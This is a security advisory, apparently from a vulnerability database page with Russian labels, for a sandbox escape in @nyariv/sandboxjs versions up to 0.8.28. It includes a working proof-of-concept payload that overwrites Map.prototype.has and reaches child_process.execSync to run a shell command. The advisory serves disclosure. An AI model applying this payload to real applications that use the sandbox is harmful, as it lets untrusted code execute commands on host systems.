Описание
@nyariv/sandboxjs has a Sandbox Escape vulnerability
Summary
As Map is in SAFE_PROTOYPES, it's prototype can be obtained via Map.prototype. By overwriting Map.prototype.has the sandbox can be escaped.
Details
This is effectively equivalent to CVE-2026-25142, but without __lookupGetter__ (let was used during testing), it turns out the let implementation is bugged:
let a = Map.prototype;
console.log(a) // undefined
const a = Map.prototype;
console.log(a) // Object [Map] {}
let a = 123;
console.log(a) // 123
const a = 123;
console.log(a) // 123
PoC
const s = require("@nyariv/sandboxjs").default;
const sb = new s();
payload = `
const m = Map.prototype;
m.has = isFinite;
console.log(
isFinite.constructor(
"return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
)(),
);`;
sb.compile(payload)().run();
Impact
Able to set Map.prototype.has -> RCE
Пакеты
Наименование
@nyariv/sandboxjs
npm
Затронутые версииВерсия исправления
<= 0.8.28
0.8.29